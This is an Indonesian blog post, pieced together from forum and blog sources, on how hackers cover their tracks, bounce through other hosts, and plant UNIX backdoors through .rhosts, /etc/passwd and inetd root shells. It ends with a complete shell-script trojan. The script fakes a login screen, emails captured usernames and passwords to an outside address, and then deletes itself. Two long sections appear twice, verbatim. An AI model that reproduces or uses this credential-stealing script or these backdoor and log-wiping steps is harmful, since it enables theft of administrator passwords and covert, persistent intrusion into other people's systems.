Seorang hacker memperkecil kemungkinan terdeteksi oleh orang lain dengan melakukan aktifitasnya disaat sistem yang akan dimasukinya tidak atau kurang diawasi. Berkaitan dengan teknik, salah satu cara yang paling umum adalah menyunting file-file log pada system yang dimasuki dan menghilangkan semua entry yang berkaitan dengan dirinya. Aktivitas yang berlangsung selama hacking, misalnya aktivitas scanning, bisa disamarkan dengan memasang kuda troya / trojan ke program-program yang digunakan utuk mengawasi jaringan (misalnya netstat). Untuk menyembunyikan identitas saat melakukan finger, dapat digunakan semacam Finger@host1@host2. Ini adalah cara untuk memperoleh informasi finger tentang host2, tetapi perintahnya dialihkan sehingga seolah-olah datang dari host1.
Cara lain untuk menyamarkan identitas saat beraksi adalah melakukan bouncing. Bouncing adalah memanfaatkan sesuatu sistem sebagai basis operasi untuk memasuki sistem lain. Dalam praktek bouncing, jejak-jejak akan mengarah ke komputer yang dijadikan basis operasi dan bukan ke lokasi hacker sebenarnya. Bouncing dapat dilakukan melalui FTP, mesin proxy server, Wingate atau host lain (dengan memanfaatkan Telnet atau rsh). Selain melalui internet, bouncing juga bisa dilakukan melalui manipulasi hubungan dengan telepon. Bouncing semacam ini sukar sekali dilacak, tetapi tingkat kesulitannya juga tinggi.
Bagi seorang hacker, selain menyulitkan pelacakan , bouncing juga berguna untuk melewati berbagai program proteksi. Umpamanya komputer A yang berfungsi sebagai Web Server dan komputer yang fungsinya sebagai FTP server berada dalam suatu jaringan / subnet yang terhubung ke internet. Komputer A diproteksi terhadap akses dari internet oleh sebuah firewall. Hacker yang ingin masuk ke komputer A dapat memerintahkan komputer B yang terbuka untuk melakukan koneksi ke port tertentu dari komputer A. koneksi ini kemudian bisa dimanfaatkan oleh hacker. Karena komputer B dan A ada di subnet yang sama, lalu lintas data yang terjadi tidak akan disaring oleh program firewall yang hanya menyaring paket dari luar subnet.
7.MEMBUAT BACKDOOR.
Selain cara menghilangkan jejak, para hacker juga tentu memikirkan cara untuk kembali ke sistem tersebut. Jika setiap kali ingin masuk harus mengulang semua proses diatas, ia akan kesulitan. Oleh karena itu hcker menggunakan apa yang disebut backdoor atau pintu belakang.
Backdoor pada dasarnya adalah jalan tembus yang dibuat oleh hacker setelah masuk, yang berguna untuk kembali tanpa perlu melalui sistem proteksi lagi. Contoh pemasangan backdor adalah modifikasi file hosts.equiv dan .rhost pada sistem UNIX. Modifikasi pada file-file tersebut memungkinkan komputer host hacker diberi status trusted oleh sistem sasaran, sehungga pengaksesan dari komputer hacker tidak disaring. Backdoor juga bisa dibuat dengan menambahkan account-account baru pada file daftar password (/etc/passwd pada UNIX standar). Alternatif dari penambahan account ini adalah pembuatan daftar password palsu, yang kemudian akan ditukar tempatnya dengan file password asli pada waktu-waktu tertentu.
Selain itu cara yang paling umum adalah dengan mengubah konfigurasi servis. Konfigurasi tidak begitu sering diperiksa (berbeda dengan daftar password dan log), sehingga kemungkinan terdeteksinya lebih kecil. File-file yang dimodifiasi misalnya /etc/inetd. Memodifikasi ini biasanya dilakukan dengan mengganti daemon dari servis yang jarang digunakan dengan suatu proses yang memberikan shell bagi hacker (etrutama akses root). Seorang hacker bukannya tidak memiliki kode etik. Justru kode etik ini sangat penting untuk membedakan seorang hacker dengan penjahat komputer yang dikejar-kejar penegak hukum. Yang juga harus dimiliki oleh seorang hacker adalah pengetahuan tentang teknik pemrograman (biasanya dalam bahasa C atau perl). Dalam membangun suatu program dalam sistem yang akan dimasuki, para hacker biasanya memerlukan perangkat keras berupa kmputer, modem dan saluran telepon. Mereka juga harus sudah terhubung ke sebuah jaringan khususnya internet. Hacker sejati tidak perlu alat yang aneh-aneh, umpamanya interface komputer otak, seperti komik Ghost in The Shell.
Quote:
8.PERANGKAT LUNAK YANG DIBUTUHKAN HACKER.
Kebutuhan utama para hacker adalah jenis sistem operasi yang digunakan. Umumnya hacker sejati menggunakan sistem operasi UNIX atau variannya, seperti RedHat, FreeBSD, SlackWare, OpenBSD dll. Kendati banyak juga program hacker yang ditulis untuk Windows dan DOS, biasanya hacker yang benar-benar serius menggunakan sistem operasi UNIX, Linux atau OpenBSD. Sistem UNIX sangat baik dan memang seja kemunculannya dirancang khusus untuk jaringan.
Jika sistem ini tidak ada, para hacker dapat menggantinya dengan berlanggnan yang disebut dengan shell account. Shell acount pada suatu ISP akan memberi pemakai sebuah shell di sistem UNIX ISP tersebut. Apa sebenarnya shell? Shell adalah perantara pemakai dan sistem operasi UNIX yang ebrfungsi sebagai penetrjemah perintah. Jenis program shell bermacam-macam, seperti Bourne Shell (sh-shell yang pertama ada) Bourne Again Shell (Bash), Korn Shell (ksh) dan C-Shell. Format perintah C-Shell mirip bahasa C, dan disebut-sebut sebagai shell ideal untuk pemrograman. Pemilikan shell acount memungkinkan pemakai login dan memberi perintah pada komputer UNIX penyedia shell account, seolah-olah komputer UNIX tersebut adalah milik pemakai (file-file pamakai yang diperoleh selama mengadakan shellaccount pun akan bertempat disana, bukan di harddisk pemakai). Ini memang dalam batas-batas tertentu bisa menutupi ketidakadaan UNIX pada komputer si pemakai.
Tetapi, pemakaian shell account memiliki beberapa kerugian. Antara lain, tidak semua ISP menyediakan shell account. Alasannya sangat sederhana, yaitu alasan keamanan, karena biasanya hanya hacker dan penjahat komputer yang perlu shell account. ISP yang menyediakan shell account kemungkinan dimiliki seorang hacker juga, yang boleh dibilang sudah maklum.
Sebenarnya bisa saja seseorang berlangganan shell account di ISP selain ISPnya, tetapi keamanan nya kurang terjamin (pengiriman passweord bisa disadap, kecuali menggunakan SSH-Secure shell), lagipula ini perlu biaya tambahan. Meskipun begitu ada juga keuntungannya, yaitu lokasi asli dari pemakai tidak akan diketahui. Salah satu metode alternatif dari berlangganan di luar negeri adalah membajak account dari sistem-sistem yang proteksinya lemah.
Backdoor pada dasarnya adalah jalan tembus yang dibuat oleh hacker setelah masuk, yang berguna untuk kembali tanpa perlu melalui sistem proteksi lagi. Contoh pemasangan backdor adalah modifikasi file hosts.equiv dan .rhost pada sistem UNIX. Modifikasi pada file-file tersebut memungkinkan komputer host hacker diberi status trusted oleh sistem sasaran, sehungga pengaksesan dari komputer hacker tidak disaring. Backdoor juga bisa dibuat dengan menambahkan account-account baru pada file daftar password (/etc/passwd pada UNIX standar). Alternatif dari penambahan account ini adalah pembuatan daftar password palsu, yang kemudian akan ditukar tempatnya dengan file password asli pada waktu-waktu tertentu.
Selain itu cara yang paling umum adalah dengan mengubah konfigurasi servis. Konfigurasi tidak begitu sering diperiksa (berbeda dengan daftar password dan log), sehingga kemungkinan terdeteksinya lebih kecil. File-file yang dimodifiasi misalnya /etc/inetd. Memodifikasi ini biasanya dilakukan dengan mengganti daemon dari servis yang jarang digunakan dengan suatu proses yang memberikan shell bagi hacker (etrutama akses root). Seorang hacker bukannya tidak memiliki kode etik. Justru kode etik ini sangat penting untuk membedakan seorang hacker dengan penjahat komputer yang dikejar-kejar penegak hukum. Yang juga harus dimiliki oleh seorang hacker adalah pengetahuan tentang teknik pemrograman (biasanya dalam bahasa C atau perl). Dalam membangun suatu program dalam sistem yang akan dimasuki, para hacker biasanya memerlukan perangkat keras berupa kmputer, modem dan saluran telepon. Mereka juga harus sudah terhubung ke sebuah jaringan khususnya internet. Hacker sejati tidak perlu alat yang aneh-aneh, umpamanya interface komputer otak, seperti komik Ghost in The Shell.
Quote:
8.PERANGKAT LUNAK YANG DIBUTUHKAN HACKER.
Kebutuhan utama para hacker adalah jenis sistem operasi yang digunakan. Umumnya hacker sejati menggunakan sistem operasi UNIX atau variannya, seperti RedHat, FreeBSD, SlackWare, OpenBSD dll. Kendati banyak juga program hacker yang ditulis untuk Windows dan DOS, biasanya hacker yang benar-benar serius menggunakan sistem operasi UNIX, Linux atau OpenBSD. Sistem UNIX sangat baik dan memang seja kemunculannya dirancang khusus untuk jaringan.
Jika sistem ini tidak ada, para hacker dapat menggantinya dengan berlanggnan yang disebut dengan shell account. Shell acount pada suatu ISP akan memberi pemakai sebuah shell di sistem UNIX ISP tersebut. Apa sebenarnya shell? Shell adalah perantara pemakai dan sistem operasi UNIX yang ebrfungsi sebagai penetrjemah perintah. Jenis program shell bermacam-macam, seperti Bourne Shell (sh-shell yang pertama ada) Bourne Again Shell (Bash), Korn Shell (ksh) dan C-Shell. Format perintah C-Shell mirip bahasa C, dan disebut-sebut sebagai shell ideal untuk pemrograman. Pemilikan shell acount memungkinkan pemakai login dan memberi perintah pada komputer UNIX penyedia shell account, seolah-olah komputer UNIX tersebut adalah milik pemakai (file-file pamakai yang diperoleh selama mengadakan shellaccount pun akan bertempat disana, bukan di harddisk pemakai). Ini memang dalam batas-batas tertentu bisa menutupi ketidakadaan UNIX pada komputer si pemakai.
Tetapi, pemakaian shell account memiliki beberapa kerugian. Antara lain, tidak semua ISP menyediakan shell account. Alasannya sangat sederhana, yaitu alasan keamanan, karena biasanya hanya hacker dan penjahat komputer yang perlu shell account. ISP yang menyediakan shell account kemungkinan dimiliki seorang hacker juga, yang boleh dibilang sudah maklum.
Sebenarnya bisa saja seseorang berlangganan shell account di ISP selain ISPnya, tetapi keamanan nya kurang terjamin (pengiriman passweord bisa disadap, kecuali menggunakan SSH-Secure shell), lagipula ini perlu biaya tambahan. Meskipun begitu ada juga keuntungannya, yaitu lokasi asli dari pemakai tidak akan diketahui. Salah satu metode alternatif dari berlangganan di luar negeri adalah membajak account dari sistem-sistem yang proteksinya lemah.
http://m.kaskus.co.id/thread/52ca757559cb17d8688b470d/cara-hacker-beraksi
Contoh kasus Trojan House, memanfaatkan SHELL script UNIX :
Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX.
“Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu”, ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut.
Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri .
Nah sebenarnya apa sih yang terjadi ?
Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut:
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan sederhana
# versi 1.0 Nopember 1999
####################################
COUNTER=0
Cat /etc/issue
While [ "$COUNTER" –ne 2 ]
do
let COUNTER=$COIUNTER+1
echo “login: \c”
read LOGIN
stty echo
echo “password: \c”
read PASSWORD
echo “User $LOGIN : $PASSWORD” | mail gadis@company.com
stty echo
echo
echo “Login Incorrect”
done
rm $0
kill –9 $PPID
Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX:
Login:
Password:
Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya.
Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan
Login:root
Password: ********
Login Incorrect
Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX.
Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !!
Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu
rm $0
kill –9 $PPID
yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya.
Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini.
http://artikel4us.wordpress.com/page/9/
http://irmayuuki.blogspot.com/2012/12/kejahatan-dewasa-ini-informasi-tentang.html
Tidak ada komentar:
Posting Komentar